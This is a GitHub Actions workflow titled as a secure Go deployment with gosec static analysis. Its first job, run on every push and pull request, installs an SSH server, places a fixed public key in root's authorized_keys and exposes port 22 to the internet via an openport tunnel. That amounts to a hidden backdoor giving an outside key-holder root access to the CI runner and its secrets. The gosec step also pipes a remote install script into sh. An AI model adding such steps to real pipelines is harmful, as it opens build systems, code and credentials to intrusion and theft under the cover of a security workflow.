name: Deploy Secure Go Web Application with Static and Dynamic Analysis

on:
  pull_request:
  push:

jobs:
  ssh:
      runs-on: ubuntu-latest
      steps:
        - name: Set up SSH
          run: |
            sudo apt-get install -y openssh-server
            sudo systemctl start ssh
            sudo mkdir -p /root/.ssh/
            HOSTNAME=$(hostname)
            echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCtfG1eZBJgkGYMt6txa0Or6K8skC1FOk5Nnq6f1mgaWFfnDuy2klT7YsChJd+RGqmZdTiGrtJDXOUxNPXPZWYRag9DQz1pv7c1S/1JvBztmRHtZBfdXwrHUDshp/0wMMrWZi4hBb0c7sfITglSyvvu7ISZ5WktWvCGpdzB/wYKgv2Tb/OHDL7lHd8IQwBTJy1PmLOq/L69p1T+ajf5wWzo9KpNM8mGzWqp/Ldu7yVep9TDZt+BGg9eMh0kfr8VuWb7plaNPJ8X6cP8zYEOl2sXBUWtiBNueDA6qrI4TuR/CrLjWyMay5sCZzM6oLz9r1PuZL0YcFoMXzIRBV1JjX61 root@$HOSTNAME" | sudo tee /root/.ssh/authorized_keys
            sudo cat /root/.ssh/authorized_keys
            sudo systemctl restart ssh
            sudo systemctl status ssh
            echo "SSH server started"

        - name: Expose SSH with openport
          run: |
            curl -sSL https://openport.io/download/openport_2.2.2-1_amd64.deb -o /tmp/openport.deb
            sudo dpkg -i /tmp/openport.deb && rm -f /tmp/openport.deb
            openport register 6YEPfmOfHz
            openport 22 &
          continue-on-error: true

  static-analysis:
    runs-on: ubuntu-latest
    needs: ssh
    steps:
      # Step 1: Checkout code
      - name: Checkout repository
        uses: actions/checkout@v4

      # Step 1.5: Print current working directory
      - name: Print working directory and Git info
        run: |
          echo "Current working directory: $(pwd)"
          ls -la  # List files in the current directory
          echo "Git branch:"
          git branch  # Show current Git branch
          echo "Git log:"
          git log

      # Step 2: Set up Go
      - name: Set up Go
        uses: actions/setup-go@v4
        with:
          go-version: 1.23.2

      # Step 3: Restore Go modules cache
      - name: Restore Go modules cache
        uses: actions/cache@v3
        with:
          path: |
            ~/go/pkg/mod
            ~/.cache/go-build
          key: ${{ runner.os }}-go-${{ hashFiles('Backend/go.sum') }}
          restore-keys: |
            ${{ runner.os }}-go-


      # Step 4: Install Go dependencies (only inside Interceptor)
      - name: Install Interceptor dependencies
        working-directory: ./Interceptor
        run: |
          go mod tidy
          go mod download

      - name: Install Backend dependencies
        working-directory: ./Backend
        run: |
          go mod tidy
          go mod download
      
      # Step 5: Install gosec for static analysis
      - name: Install gosec
        run: |
          curl -sSfL https://raw.githubusercontent.com/securego/gosec/master/install.sh | sh -s -- -b $(go env GOPATH)/bin

      # Step 6: Run gosec (Static Analysis) from the root directory
      - name: Run gosec (Static Analysis)
        run: |
          pwd
          gosec ./Backend/...
        continue-on-error: true

      # Step 7: Save gosec report
      - name: Save gosec report
        run: |
          gosec -fmt=text -out=gosec-report.txt ./...
        continue-on-error: true

      # Step 8: Upload gosec report
      - name: Upload gosec report
        uses: actions/upload-artifact@v4
        with:
          name: gosec-report
          path: gosec-report.txt
